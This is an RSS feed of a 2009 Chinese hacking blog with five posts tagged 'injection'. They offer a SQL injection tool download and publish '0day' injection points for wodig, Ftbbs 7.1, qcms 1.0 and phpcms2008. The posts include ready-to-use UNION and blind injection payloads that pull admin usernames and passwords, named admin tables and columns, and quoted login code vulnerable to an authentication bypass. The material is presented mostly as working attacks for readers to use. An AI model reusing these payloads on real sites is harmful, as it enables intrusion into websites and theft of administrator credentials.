<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>P9's BLOG &#187; 注入</title>
	<atom:link href="http://www.p9.net.cn/tag/%e6%b3%a8%e5%85%a5/feed" rel="self" type="application/rss+xml" />
	<link>http://www.p9.net.cn</link>
	<description>同一天地间,同一网络下,P9'Blog与您共享今日互联网→WWW.P9.NET.CN</description>
	<lastBuildDate>Thu, 28 Apr 2011 23:57:55 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Pangolin v2.3.0.948注入工具下载</title>
		<link>http://www.p9.net.cn/sec/pangolin-v230948.html</link>
		<comments>http://www.p9.net.cn/sec/pangolin-v230948.html#comments</comments>
		<pubDate>Wed, 27 May 2009 01:15:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1644</guid>
		<description><![CDATA[这个不用多解释了吧,比较优秀的黑客注入软件,现在pangolin2.0出中文版了也兼任了utf8注入在不会出现乱码现象了,不过可惜的pangolin免费版功能缩减了不少不再支持mysql数据库等,个人认为还是和pangolin1.3.650结合使用比较好,毕竟1.0版功能上还是比较全面的.pangolin官方下载地址:http://www.nosec.org/zh-hans/pangolin_download.html
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_1645" class="wp-caption alignright" style="width: 120px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-1645" title="pangolin注入工具" src="http://www.p9.net.cn/wp-content/uploads/2009/05/pangolin.jpg" alt="pangolin2.3.0.948注入工具下载" width="110" height="94" /></a><p class="wp-caption-text">pangolin2.3.0.948注入工具下载</p></div>
<p>这个不用多解释了吧,比较优秀的黑客注入软件,现在pangolin2.0出中文版了也兼任了utf8注入在不会出现乱码现象了,不过可惜的pangolin免费版功能缩减了不少不再支持mysql数据库等,个人认为还是和pangolin1.3.650结合使用比较好,毕竟1.0版功能上还是比较全面的.pangolin官方下载地址:<a href="http://www.nosec.org/zh-hans/pangolin_download.html" target="_blank">http://www.nosec.org/zh-hans/pangolin_download.html</a></p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1644&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1644" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/pangolin-v230948.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>wodig注入漏洞</title>
		<link>http://www.p9.net.cn/sec/wodig-pours-into-the-crack.html</link>
		<comments>http://www.p9.net.cn/sec/wodig-pours-into-the-crack.html#comments</comments>
		<pubDate>Fri, 22 May 2009 00:48:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1578</guid>
		<description><![CDATA[wodig漏洞文件Default.asp?tags_name=a&#8217;
article.asp?Src_Child=1&#38;Src_ChildSub=a&#8217;
wodig.asp?tags_name=a&#8217;这三个注入点在前面加上网址就可以注入了,注意必须是mssql数据库才可以注入管理员表式wo_users 列是username userpass以上信息转载自网络
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/注入"><img class="size-full wp-image-690" title="黑客安全" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="wodig注入漏洞" width="90" height="100" /></a><p class="wp-caption-text">wodig注入漏洞</p></div>
<p>wodig漏洞文件Default.asp?tags_name=a&#8217;</p>
<p>article.asp?Src_Child=1&amp;Src_ChildSub=a&#8217;</p>
<p>wodig.asp?tags_name=a&#8217;这三个注入点在前面加上网址就可以注入了,注意必须是mssql数据库才可以注入管理员表式wo_users 列是username userpass以上信息转载自网络</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1578&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1578" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/wodig-pours-into-the-crack.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ftbbs7.1静态GBK版注入0day(coolkid提供)</title>
		<link>http://www.p9.net.cn/sec/ftbbs71-0day.html</link>
		<comments>http://www.p9.net.cn/sec/ftbbs71-0day.html#comments</comments>
		<pubDate>Tue, 07 Apr 2009 01:58:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[注入]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1160</guid>
		<description><![CDATA[Ftbbs7.1静态GBK版ftbbsmyinfo.asp文件存在注入漏洞目前0day利用方式http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin
请使用ftbbs的用户关注它的官网安全补丁发布.
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/0day"><img class="size-full wp-image-690" title="ftbbs7.1注入漏洞" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="ftbbs7.1注入漏洞" width="90" height="100" /></a><p class="wp-caption-text">ftbbs7.1注入漏洞</p></div>
<p>Ftbbs7.1静态GBK版ftbbsmyinfo.asp文件存在注入漏洞目前0day利用方式<a href="http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin">http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin</a></p>
<p>请使用ftbbs的用户关注它的官网安全补丁发布.</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1160&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1160" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/ftbbs71-0day.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Qcms1.0漏洞</title>
		<link>http://www.p9.net.cn/sec/qcms-vulnerability.html</link>
		<comments>http://www.p9.net.cn/sec/qcms-vulnerability.html#comments</comments>
		<pubDate>Thu, 26 Mar 2009 10:26:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[注入]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=973</guid>
		<description><![CDATA[qcms 0day漏洞如下：
1.可以下载数据库。
2.注入：
后台的登陆文件
见Login.asp(登陆的判断处理)
代码如下：
admin_name=trim(request.Form(&#8220;admin_name&#8221;))
admin_password=trim(request.Form(&#8220;admin_password&#8221;))
admin_password=md5(admin_password)
if admin_name=&#8221;" then
session(&#8220;admin_name&#8221;)=&#8221;"
%&#62;
&#60;SCRIPT LANGUAGE=vbscript&#62;
&#60;!&#8211;
msgbox(&#8220;请输入用户名!&#8221;)
window.self.location.href=&#8221;admin_login.asp&#8221;
&#8211;&#62;
&#60;/SCRIPT&#62;
&#60;%
else
if admin_password=&#8221;" then
session(&#8220;admin_name&#8221;)=&#8221;"
%&#62;
&#60;SCRIPT LANGUAGE=vbscript&#62;
&#60;!&#8211;
msgbox(&#8220;请输入密码!&#8221;)
window.self.location.href=&#8221;admin_login.asp&#8221;
&#8211;&#62;
&#60;/SCRIPT&#62;
&#60;%
else
sql=&#8221;select * from admin where admin_name=&#8217;&#8221;&#38;admin_name&#38;&#8221;&#8216; and admin_password=&#8217;&#8221;&#38;admin_password&#38;&#8221;&#8216;&#8221;
很明显，传说的万能密码，重现江湖。
上传漏洞。
没做任何判断，也没有。
也没用权限判断。
代码就不给了，大家自己找。
后台一处
插件：fckeditor
也有上传漏洞，网上有，大家自己看
暴库：
代码如下：
&#60;%
set conn=server.createobject(&#8220;adodb.connection&#8221;)
conn.open &#8220;driver={microsoft access driver (*.mdb)};dbq=&#8221;&#38;server.mappath(&#8220;/db.mdb&#8221;)
%&#62;
没任何处理
这个版本和我向作者提交漏洞的版本不一样！
这个版本没用防注入。
就这几个，简单，但很致命。
后面的这几个版本，我向作者提交了不少漏洞，基本修复，所以只有挑软柿子，给大家讲讲这个版本。
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-690" title="qcms 0day" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="qcms 0day" width="90" height="100" /></a><p class="wp-caption-text">qcms 0day</p></div>
<p>qcms 0day漏洞如下：<br />
1.可以下载数据库。<br />
2.注入：<br />
后台的登陆文件<br />
见Login.asp(登陆的判断处理)<br />
代码如下：<br />
admin_name=trim(request.Form(&#8220;admin_name&#8221;))<br />
<span id="more-973"></span>admin_password=trim(request.Form(&#8220;admin_password&#8221;))<br />
admin_password=md5(admin_password)<br />
if admin_name=&#8221;" then<br />
session(&#8220;admin_name&#8221;)=&#8221;"<br />
%&gt;<br />
&lt;SCRIPT LANGUAGE=vbscript&gt;<br />
&lt;!&#8211;<br />
msgbox(&#8220;请输入用户名!&#8221;)<br />
window.self.location.href=&#8221;admin_login.asp&#8221;<br />
&#8211;&gt;<br />
&lt;/SCRIPT&gt;<br />
&lt;%<br />
else<br />
if admin_password=&#8221;" then<br />
session(&#8220;admin_name&#8221;)=&#8221;"<br />
%&gt;<br />
&lt;SCRIPT LANGUAGE=vbscript&gt;<br />
&lt;!&#8211;<br />
msgbox(&#8220;请输入密码!&#8221;)<br />
window.self.location.href=&#8221;admin_login.asp&#8221;<br />
&#8211;&gt;<br />
&lt;/SCRIPT&gt;<br />
&lt;%<br />
else<br />
sql=&#8221;select * from admin where admin_name=&#8217;&#8221;&amp;admin_name&amp;&#8221;&#8216; and admin_password=&#8217;&#8221;&amp;admin_password&amp;&#8221;&#8216;&#8221;<br />
很明显，传说的万能密码，重现江湖。</p>
<p>上传漏洞。<br />
没做任何判断，也没有。<br />
也没用权限判断。<br />
代码就不给了，大家自己找。<br />
后台一处<br />
插件：fckeditor<br />
也有上传漏洞，网上有，大家自己看<br />
暴库：<br />
代码如下：<br />
&lt;%<br />
set conn=server.createobject(&#8220;adodb.connection&#8221;)<br />
conn.open &#8220;driver={microsoft access driver (*.mdb)};dbq=&#8221;&amp;server.mappath(&#8220;/db.mdb&#8221;)<br />
%&gt;<br />
没任何处理</p>
<p>这个版本和我向作者提交漏洞的版本不一样！<br />
这个版本没用防注入。</p>
<p>就这几个，简单，但很致命。</p>
<p>后面的这几个版本，我向作者提交了不少漏洞，基本修复，所以只有挑软柿子，给大家讲讲这个版本。</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=973&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_973" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/qcms-vulnerability.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>phpcms2008-0day ask/search_ajax.php注入漏洞</title>
		<link>http://www.p9.net.cn/sec/phpcms2008-0day-ask-search_ajax-php.html</link>
		<comments>http://www.p9.net.cn/sec/phpcms2008-0day-ask-search_ajax-php.html#comments</comments>
		<pubDate>Mon, 16 Mar 2009 00:49:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=855</guid>
		<description><![CDATA[作者：nuke
受影响程序： phpcms2008 gbk
漏洞文件：ask/search_ajax.php
测试方法：
ask/search_ajax.php?q=s%E6&#8242;/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0&#215;706870636D73)&#62;52%23
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-690" title="安全" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="安全" width="90" height="100" /></a><p class="wp-caption-text">安全</p></div>
<p>作者：nuke<br />
受影响程序： phpcms2008 gbk<br />
漏洞文件：ask/search_ajax.php<br />
测试方法：<br />
ask/search_ajax.php?q=s%E6&#8242;/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0&#215;706870636D73)&gt;52%23</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=855&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_855" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/phpcms2008-0day-ask-search_ajax-php.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

